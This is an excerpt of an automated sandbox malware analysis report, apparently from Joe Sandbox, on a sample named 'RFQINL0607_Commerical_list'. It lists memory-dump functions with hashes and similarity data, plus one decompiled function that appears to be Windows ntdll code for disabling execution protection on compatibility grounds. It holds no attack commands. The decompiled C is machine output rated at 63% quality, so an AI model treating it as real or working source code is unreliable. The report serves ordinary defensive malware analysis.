                                                                                                                                                                                  • Instruction ID: 3ced70ff38ced2187ab550406c317c043b441c53f4148a8bfe3c3ea88af6581f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 92ca7d28f868fcf7430ed8b80d4790645ab64fe57641480489494d577845f343
                                                                                                                                                                                  • Instruction Fuzzy Hash: 19900265613004034509755C4514616450EC7E0203B51C426E1004950DC93588957125
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b3969796aa768f8a3efd5488169a65a2912df3a317b0b9186a237c9a1462f059
                                                                                                                                                                                  • Instruction ID: 220e8c43bbfa5e0e7f09931cf9accc0ae7cd130845fb9656cdda947621ba3565
                                                                                                                                                                                  • Opcode Fuzzy Hash: b3969796aa768f8a3efd5488169a65a2912df3a317b0b9186a237c9a1462f059
                                                                                                                                                                                  • Instruction Fuzzy Hash: A8900235A1600C02D554755C45147460509C7D0303F51C416A0014A14DCB658A5976A1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333929D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 89b2e07f9e0ea88f31020a80e6f6c54a51c036684753247a3183133d17f9de30
                                                                                                                                                                                  • Instruction ID: 9e875131142af3c5e9101d6f5b19b634aa13e1216a802fdb45f4f149c8d680e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89b2e07f9e0ea88f31020a80e6f6c54a51c036684753247a3183133d17f9de30
                                                                                                                                                                                  • Instruction Fuzzy Hash: 559002A5612144924904A65C8504B0A4A09C7E0203B51C41BE1044920CC9358855A135
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333938D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6f79cb67364e0dae1dd7d447f51591263122e4234b0507db3f1e2d3115320136
                                                                                                                                                                                  • Instruction ID: 4bad68a366d73ee4603d2872ac819dff905caa2183d17769d4b00bda4e39ccf1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f79cb67364e0dae1dd7d447f51591263122e4234b0507db3f1e2d3115320136
                                                                                                                                                                                  • Instruction Fuzzy Hash: DD90022565605502D554755C45046164509E7E0203F51C426A0804954DC96588597221
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392F30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 077bc6661c391be168bfd86fb56a74b06524279cc2234454e0171bf4740756ea
                                                                                                                                                                                  • Instruction ID: 9befc8fe5bbde0373371161aa4b489ba3c2eb58f5857a6d80600cb70c9686d87
                                                                                                                                                                                  • Opcode Fuzzy Hash: 077bc6661c391be168bfd86fb56a74b06524279cc2234454e0171bf4740756ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E90022561244842D544665C4904B0F4609C7E1203F91C41EA4146914CCD2588596721
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 821cfa1d2022e5c3662fa9f0b06ad4eec68c7150ea5b75d8ca0e94c57d6863d4
                                                                                                                                                                                  • Instruction ID: c52c6c871eb9dd63032f57d9d0172e291aa03b9e6951920926a350a5c5702262
                                                                                                                                                                                  • Opcode Fuzzy Hash: 821cfa1d2022e5c3662fa9f0b06ad4eec68c7150ea5b75d8ca0e94c57d6863d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1690022565200C02D544755C8514707050AC7D0603F51C416A0014914DCA26896976B1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392E00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6fee29ce4a15a925bf6d6fefb93236095c9580e3ec6d7c480d834f02651b75a8
                                                                                                                                                                                  • Instruction ID: 52500d28196b7d8150fbd25c4702e69277fa19028f0d79abeb47f534633da4de
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6fee29ce4a15a925bf6d6fefb93236095c9580e3ec6d7c480d834f02651b75a8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C90026561240803D544695C49046070509C7D0303F51C416A2054915ECE398C557135
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 40bb9df81a8b1af32e002381cb9c4325cfd06351bad29b39c4cb53ae8618abc8
                                                                                                                                                                                  • Instruction ID: 3ed44ff7f1dbf8ccbf3f23621c94f4e7124b29ab52a9faee3fb5e08ae8141a37
                                                                                                                                                                                  • Opcode Fuzzy Hash: 40bb9df81a8b1af32e002381cb9c4325cfd06351bad29b39c4cb53ae8618abc8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8090026562200442D508655C45047060549C7E1203F51C417A2144914CC9398C656125
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 1842cc6bf54dcaa3e39334f3da49edc7b01390193796d7a5d3a7d42f961c515e
                                                                                                                                                                                  • Instruction ID: e0f37ce0696e3d8449e13c4d9559f8482926fcec18ae7f684ad7a5fde11f13c0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1842cc6bf54dcaa3e39334f3da49edc7b01390193796d7a5d3a7d42f961c515e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7490023561240802D504655C49087470509C7D0303F51C416A5154915ECA75C8957531
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392D50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 36fa4b277625eb08d676e834faf77f2f66fad03c6e7a51dd9725b8647d16c3f3
                                                                                                                                                                                  • Instruction ID: e2d6b792a102d3ca32166f76c5fe0375e3a31217e382873bf042c9e7fbc5d948
                                                                                                                                                                                  • Opcode Fuzzy Hash: 36fa4b277625eb08d676e834faf77f2f66fad03c6e7a51dd9725b8647d16c3f3
                                                                                                                                                                                  • Instruction Fuzzy Hash: B290022571200802D506655C4514606050DC7D1347F91C417E1414915DCA358957B132
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33392B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                  • Instruction ID: 1a96ec45b3eab07047eb4bb8792d677b025a3709182e84e9c7e7f10f2e9426d0
                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3342A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: HEAP:
                                                                                                                                                                                  • API String ID: 3446177414-2466845122
                                                                                                                                                                                  • Opcode ID: 56742e0f735a11a8953a74817998151df807b73cae25b402a6a618b4899cc3d0
                                                                                                                                                                                  • Instruction ID: 2140c6089fc911f5eb900be3eb0417f0866d7059df28757714c72d1b5307b795
                                                                                                                                                                                  • Opcode Fuzzy Hash: 56742e0f735a11a8953a74817998151df807b73cae25b402a6a618b4899cc3d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA16875A083128FE704CF28C894A1ABBE5FF88354F19456AED45EB311EB70EC46CB95
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33387550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                                  			E33387550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x3344b370 ^ _t107;
				_v8 =  *0x3344b370 ^ _t107;
				_t105 = __ecx;
				if( *0x33446664 == 0) {
					L5:
					return E33394B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E3335E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E33387738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E3338763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E33392B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E333876ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E333DEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E33398F40( &_v548, 0, 0x214);
						_t106 =  *0x33446664;
						_t110 = _t108 + 0x20;
						 *0x334491e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x33446664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							L33394C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E333DEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E3339A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E333DEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E3339A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E333DEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								L333CCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E333DEF10();
						goto L15;
					}
					L8:
					_t56 = E33387648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}
































                                                                                                                                                                                  0x33387560
                                                                                                                                                                                  0x33387562
                                                                                                                                                                                  0x3338756f
                                                                                                                                                                                  0x33387571
                                                                                                                                                                                  0x333875ab
                                                                                                                                                                                  0x333875b9
                                                                                                                                                                                  0x333875b9
                                                                                                                                                                                  0x33387579
                                                                                                                                                                                  0x33387583
                                                                                                                                                                                  0x3338758f
                                                                                                                                                                                  0x333c4443
                                                                                                                                                                                  0x33387595
                                                                                                                                                                                  0x3338759e
                                                                                                                                                                                  0x3338759e
                                                                                                                                                                                  0x333875a2
                                                                                                                                                                                  0x333875bc
                                                                                                                                                                                  0x333875c2
                                                                                                                                                                                  0x333875c7
                                                                                                                                                                                  0x333875c9
                                                                                                                                                                                  0x33387621
                                                                                                                                                                                  0x33387623
                                                                                                                                                                                  0x33387624
                                                                                                                                                                                  0x333875f8
                                                                                                                                                                                  0x333875ff
                                                                                                                                                                                  0x33387601
                                                                                                                                                                                  0x3338762c
                                                                                                                                                                                  0x33387603
                                                                                                                                                                                  0x33387609
                                                                                                                                                                                  0x33387610
                                                                                                                                                                                  0x33387612
                                                                                                                                                                                  0x33387612
                                                                                                                                                                                  0x33387612
                                                                                                                                                                                  0x33387614
                                                                                                                                                                                  0x33387616
                                                                                                                                                                                  0x33387630
                                                                                                                                                                                  0x33387633
                                                                                                                                                                                  0x33387633
                                                                                                                                                                                  0x33387618
                                                                                                                                                                                  0x3338761a
                                                                                                                                                                                  0x333c45c9
                                                                                                                                                                                  0x333c45c9
                                                                                                                                                                                  0x333c45d1
                                                                                                                                                                                  0x333c45d2
                                                                                                                                                                                  0x333c45d4
                                                                                                                                                                                  0x333c45d6
                                                                                                                                                                                  0x333c45d6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3338761a
                                                                                                                                                                                  0x333875ce
                                                                                                                                                                                  0x333875d4
                                                                                                                                                                                  0x333875da
                                                                                                                                                                                  0x333875df
                                                                                                                                                                                  0x333875e1
                                                                                                                                                                                  0x333c444a
                                                                                                                                                                                  0x333c4450
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c4456
                                                                                                                                                                                  0x333c4469
                                                                                                                                                                                  0x333c4476
                                                                                                                                                                                  0x333c4486
                                                                                                                                                                                  0x333c448b
                                                                                                                                                                                  0x333c4497
                                                                                                                                                                                  0x333c44b9
                                                                                                                                                                                  0x333c44bf
                                                                                                                                                                                  0x333c44c1
                                                                                                                                                                                  0x333c44c3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c44c9
                                                                                                                                                                                  0x333c44cf
                                                                                                                                                                                  0x333c44d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c44dc
                                                                                                                                                                                  0x333c44de
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c44e6
                                                                                                                                                                                  0x333c44ed
                                                                                                                                                                                  0x333c44ef
                                                                                                                                                                                  0x333c45c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c45c4
                                                                                                                                                                                  0x333c44f7
                                                                                                                                                                                  0x333c44f8
                                                                                                                                                                                  0x333c4510
                                                                                                                                                                                  0x333c4515
                                                                                                                                                                                  0x333c4524
                                                                                                                                                                                  0x333c452b
                                                                                                                                                                                  0x333c452c
                                                                                                                                                                                  0x333c452e
                                                                                                                                                                                  0x333c4556
                                                                                                                                                                                  0x333c4561
                                                                                                                                                                                  0x333c4567
                                                                                                                                                                                  0x333c4569
                                                                                                                                                                                  0x333c456c
                                                                                                                                                                                  0x333c456e
                                                                                                                                                                                  0x333c4574
                                                                                                                                                                                  0x333c4576
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c457c
                                                                                                                                                                                  0x333c457c
                                                                                                                                                                                  0x333c4584
                                                                                                                                                                                  0x333c4588
                                                                                                                                                                                  0x333c458a
                                                                                                                                                                                  0x333c458c
                                                                                                                                                                                  0x333c458e
                                                                                                                                                                                  0x333c458e
                                                                                                                                                                                  0x333c459b
                                                                                                                                                                                  0x333c45a0
                                                                                                                                                                                  0x333c45a7
                                                                                                                                                                                  0x333c45ac
                                                                                                                                                                                  0x333c45ae
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c45b4
                                                                                                                                                                                  0x333c45b4
                                                                                                                                                                                  0x333c45b7
                                                                                                                                                                                  0x333c45b7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c45bf
                                                                                                                                                                                  0x333c4530
                                                                                                                                                                                  0x333c4535
                                                                                                                                                                                  0x333c4537
                                                                                                                                                                                  0x333c4539
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333c453e
                                                                                                                                                                                  0x333875e7
                                                                                                                                                                                  0x333875e9
                                                                                                                                                                                  0x333875ee
                                                                                                                                                                                  0x333875f0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333875f2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333875a4
                                                                                                                                                                                  0x333875a4
                                                                                                                                                                                  0x333875a4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333875a4

                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 333C4460
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 333C4592
                                                                                                                                                                                  • ExecuteOptions, xrefs: 333C44AB
                                                                                                                                                                                  • Execute=1, xrefs: 333C451E
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 333C4507
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 333C4530
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 333C454D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: b3f694094c1563fe59c78d7527353a5f381b7ddc9576fc6ce915c768c79b29a2
                                                                                                                                                                                  • Instruction ID: ca67d3cda2cf81eb48a24750a5d1bdad4b7a96764f513e484531689b60928e27
                                                                                                                                                                                  • Opcode Fuzzy Hash: b3f694094c1563fe59c78d7527353a5f381b7ddc9576fc6ce915c768c79b29a2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B512876D41329AAEF119FA4DC84FE973ADEF08340F4485A9F505AB181DB709E498F50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
